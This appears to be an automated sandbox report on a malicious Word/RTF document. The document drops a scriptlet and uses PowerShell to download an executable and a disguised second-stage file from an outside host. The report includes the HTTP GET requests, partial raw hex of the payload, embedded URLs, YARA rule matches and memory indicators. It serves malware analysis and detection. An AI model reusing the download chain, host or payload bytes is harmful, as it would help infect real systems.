                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 09:23:18 GMTContent-Type: application/x-msdownloadContent-Length: 194560Last-Modified: Fri, 14 Jan 2022 05:56:32 GMTConnection: keep-aliveETag: "61e11090-2f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 09:23:22 GMTContent-Type: application/x-msdownloadContent-Length: 194560Last-Modified: Fri, 14 Jan 2022 05:56:32 GMTConnection: keep-aliveETag: "61e11090-2f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 09:23:23 GMTContent-Type: application/x-msdownloadContent-Length: 194560Last-Modified: Fri, 14 Jan 2022 05:56:32 GMTConnection: keep-aliveETag: "61e11090-2f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28
                    Source: global trafficHTTP traffic detected: GET /okcff.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mitmar-pl.comConnection: Keep-Alive
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                    Source: powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmpString found in binary or memory: httP://mitmar-pl.com/ok
                    Source: powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmpString found in binary or memory: httP://mitmar-pl.com/okcff.ex
                    Source: powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmpString found in binary or memory: httP://mitmar-pl.com/okcff.exe
                    Source: powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmpString found in binary or memory: httP://mitmar-pl.com/okcff.exePE
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
                    Source: powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.441337667.0000000003819000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmpString found in binary or memory: http://mitmar-pl.com
                    Source: okcff.exeString found in binary or memory: http://mitmar-pl.com/Crkrqdrd.jpeg
                    Source: okcff.exe, 00000009.00000000.439195914.00000000009F2000.00000020.00020000.sdmp, okcff.exe, 00000009.00000002.620997931.00000000009F2000.00000020.00020000.sdmpString found in binary or memory: http://mitmar-pl.com/Crkrqdrd.jpegi
                    Source: powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.444532419.000000001B5C6000.00000004.00000001.sdmpString found in binary or memory: http://mitmar-pl.com/okcff.exe
                    Source: powershell.exe, 00000003.00000002.437210048.00000000023B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.438620831.0000000002450000.00000002.00020000.sdmp, okcff.exe, 00000009.00000002.624048048.0000000004D70000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                    Source: okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.437210048.00000000023B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.438620831.0000000002450000.00000002.00020000.sdmp, okcff.exe, 00000009.00000002.624048048.0000000004D70000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                    Source: powershell.exe, 00000005.00000002.438200981.00000000003EF000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/cclean
                    Source: powershell.exe, 00000005.00000002.438200981.00000000003EF000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: okcff.exeString found in binary or memory: https://google.com
                    Source: okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmpString found in binary or memory: https://google.com/
                    Source: okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmpString found in binary or memory: https://google.comD
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.621327809.00000000022E7000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5349C035-C6A0-4C16-B632-E1A36FB414FC}.tmpJump to behavior
                    Source: unknownDNS traffic detected: queries for: mitmar-pl.com
                    Source: global trafficHTTP traffic detected: GET /okcff.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mitmar-pl.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /okcff.exe HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /okcff.exe HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /Crkrqdrd.jpeg HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive

                    System Summary:

                    barindex
                    Microsoft Office creates scripting filesShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScTJump to behavior
                    Office process drops PE fileShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exeJump to dropped file
                    Document contains OLE streams with names of living off the land binariesShow sources
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drStream path '_1703660897/\x1Ole10Native' : 4{....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaD.\abdtfhghgeghDp..ScT.<.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drStream path '_1703660925/\x1Ole10Native' : $|....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..z..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Document contains a stream with embedded javascript codeShow sources
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drStream path '_1703660897/\x1Ole10Native' : Found JS content: 4{....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaD.\abdtfhghgeghDp..ScT.<............................................................................................................................................................
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drStream path '_1703660925/\x1Ole10Native' : Found JS content: $|....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..z.....................................................................................................................................
                    Powershell drops PE fileShow sources
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\okcff.exeJump to dropped file
                    .NET source code contains very large array initializationsShow sources
                    Source: 41.0.okcff.exe.400000.5.unpack, u003cPrivateImplementationDetailsu003eu007bFF1D0D87u002d84BBu002d46D1u002d97D2u002dB6B1FCD58796u007d/u003252DC26Eu002d1C55u002d40FBu002d95BAu002dCAC79903EF30.csLarge array initialization: .cctor: array initializer size 11933
                    Source: 41.0.okcff.exe.400000.7.unpack, u003cPrivateImplementationDetailsu003eu007bFF1D0D87u002d84BBu002d46D1u002d97D2u002dB6B1FCD58796u007d/u003252DC26Eu002d1C55u002d40FBu002d95BAu002dCAC79903EF30.csLarge array initialization: .cctor: array initializer size 11933
                    Source: 41.0.okcff.exe.400000.9.unpack, u003cPrivateImplementationDetailsu003eu007bFF1D0D87u002d84BBu002d46D1u002d97D2u002dB6B1FCD58796u007d/u003252DC26Eu002d1C55u002d40FBu002d95BAu002dCAC79903EF30.csLarge array initialization: .cctor: array initializer size 11933
                    Source: 41.0.okcff.exe.400000.13.unpack, u003cPrivateImplementationDetailsu003eu007bFF1D0D87u002d84BBu002d46D1u002d97D2u002dB6B1FCD58796u007d/u003252DC26Eu002d1C55u002d40FBu002d95BAu002dCAC79903EF30.csLarge array initialization: .cctor: array initializer size 11933
                    Found suspicious RTF objectsShow sources
                    Source: abdtfhgXgeghDp.ScTStatic RTF information: Object: 0 Offset: 000007CDh abdtfhgXgeghDp.ScT
                    Source: 9.2.okcff.exe.334b4b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
                    Source: 00000005.00000002.438152998.00000000003A0000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
                    Source: 00000003.00000002.436663453.0000000000380000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drOLE indicator application name: unknown
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_003D25199_2_003D2519
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_003D4D799_2_003D4D79
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_021109409_2_02110940
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02110E009_2_02110E00
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0218D1489_2_0218D148
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0218778F9_2_0218778F
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02184B989_2_02184B98
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0218A8D09_2_0218A8D0
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02187F389_2_02187F38
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02188D889_2_02188D88
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_021890229_2_02189022
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02184EC89_2_02184EC8
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02185C809_2_02185C80
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_021A4AB09_2_021A4AB0
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0542A0E39_2_0542A0E3
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0542B3709_2_0542B370
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0542AEC09_2_0542AEC0
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0542A12A9_2_0542A12A
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0542A8079_2_0542A807
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0542A8F29_2_0542A8F2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0542AF829_2_0542AF82
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0542078A9_2_0542078A
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 41_2_0020533041_2_00205330
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 41_2_0020635041_2_00206350
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 41_2_0020209941_2_00202099
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 41_2_0020567841_2_00205678
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drOLE indicator has summary info: false
                    Source: okcff[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: okcff.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: C:\Users\user\AppData\Roaming\okcff.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
